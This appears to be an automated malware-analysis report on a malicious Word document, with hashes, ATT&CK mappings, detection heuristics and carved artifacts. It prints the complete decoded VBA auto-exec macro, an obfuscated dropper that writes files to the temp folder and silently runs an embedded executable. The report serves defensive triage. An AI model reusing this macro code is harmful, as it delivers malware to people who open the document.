Office (OLE) malware analysis — malicious · 90c1d48d41c2660e

MALICIOUS

Office (OLE)

252.5 KB Created: 2016-01-21 22:06:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: ffef39d50552e76d38178ade5fefc9f8 SHA-1: c3df66cd7a5d3e242fc054205c4e74b1ae085b82 SHA-256: 90c1d48d41c2660eca4babeaa2bd6a31e53d723d4bc4286fc9aa6b303a8f97f3

694 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1137.002 Office Application Startup T1204.002 Malicious File T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample contains obfuscated VBA macros that utilize `CreateObject` and `Shell` functions to execute an embedded PE executable. The macro attempts to save the embedded executable to a temporary location and then execute it. The embedded executable is saved as `embedded_office_00004a6a.exe` and is likely the second-stage payload. The macro also attempts to establish persistence by writing to the Run key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy`.

Heuristics 20

OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY

Reference to WriteProcessMemory API
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Dim ahfe As Variant
ahfe = Shell(ygef, 0)
End Function
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
SoTytBs (2)
Set ttrtafsVBvsa = CreateObject(Munew(19 + 68) & "or" + "d.A" & "pplication")
ttrtafsVBvsa.Visible = False
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

SoTytBs (2)
Set ttrtafsVBvsa = CreateObject(Munew(19 + 68) & "or" + "d.A" & "pplication")
ttrtafsVBvsa.Visible = False

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
    GVHASD = "q;lwdk iqwhdjkqw"
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Function
Sub Workbook_Open()
    FFjansaS
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
End Function
Sub Auto_Open()
    FFjansaS
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
TTVVSdDW = "T" & TTVVSdDW & "P"
DGSAHW = Environ(TTVVSdDW) + ERABSDS
DFTWAS = "."
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.joeblogs.co.uk In document text (OLE body)
- http://www.learndirect.co.ukIn document text (OLE body)
- http://www.monster.co.ukIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1911 bytes
SHA-256: `0f958143d4985155edc9c7d7e701a0cec6aead737a94b2ee96867e4b5a1364f2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub NjasbjwS() FFjansaS End Sub Sub SoTytBs(Jnqj As Long) Dim YQGDA As String, bhsBsd As Long Dim Bhsad As Long Bhsad = Jnqj + Timer bhsBsd = Bhsad Do While Timer < bhsBsd UQWHDB = UQWHDB + ";l12kel j1l2k" DoEvents Loop End Sub Sub FFjansaS() Dim fdaa As Integer Dim QQNCC As String OIOEJSDA = DatePart("yyyy", "10/11/7541") OIOEJSDA = Left(OIOEJSDA, 1) TTVVSdDW = "E" & "M" fdaa = CInt(OIOEJSDA) - 8 On Error Resume Next ERABSDS = Left("\d\", 1) TTVVSdDW = "T" & TTVVSdDW & "P" DGSAHW = Environ(TTVVSdDW) + ERABSDS DFTWAS = "." MONE = DFTWAS + Chr(94 + 8 + fdaa) & "x" MONE = MONE + Chr(7 + 94) JNBBH = DFTWAS + "rt" & "f" TTTDADSS = DGSAHW + "gvnghjas" + JNBBH RRTFDASD = DGSAHW + "qoiwdj" + JNBBH QQNCC = DGSAHW + "lof4" & MONE ForwNs (TTTDADSS) ForwNs (RRTFDASD) SoTytBs (2) Set ttrtafsVBvsa = CreateObject(Munew(19 + 68) & "or" + "d.A" & "pplication") ttrtafsVBvsa.Visible = False ttrtafsVBvsa.Documents.Open (TTTDADSS) SoTytBs (2) HYUASGD = Module1.Mshduwh(QQNCC) SoTytBs (1) ttrtafsVBvsa.Quit Set ttrtafsVBvsa = Nothing End Sub Public Function Munew(eygf As Integer) Munew = Chr(eygf) End Function Sub Workbook_Open() FFjansaS End Sub Sub AutoOpen() GVHASD = "q;lwdk iqwhdjkqw" NjasbjwS End Sub Public Function ForwNs(gtyqwd As String) ActiveDocument.SaveAs FileName:=gtyqwd, FileFormat:=wdFormatRTF End Function Sub Auto_Open() FFjansaS End Sub Attribute VB_Name = "Module1" Public Function Mshduwh(ygef As String) Dim ahfe As Variant ahfe = Shell(ygef, 0) End Function
`embedded_office_00004a6a.exe`	embedded-pe	Office MZ+PE at offset 0x4A6A	239510 bytes
SHA-256: `59afb27c81985bfdc1e149f9b970c9a1eb93d392435437618e1df431657eabc9`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1525007934/Ole10Native	192800 bytes
SHA-256: `57ebd043be01e0c512f01db39bd587549ffaf7208ada79aee0eb5a757abce137`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.41, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.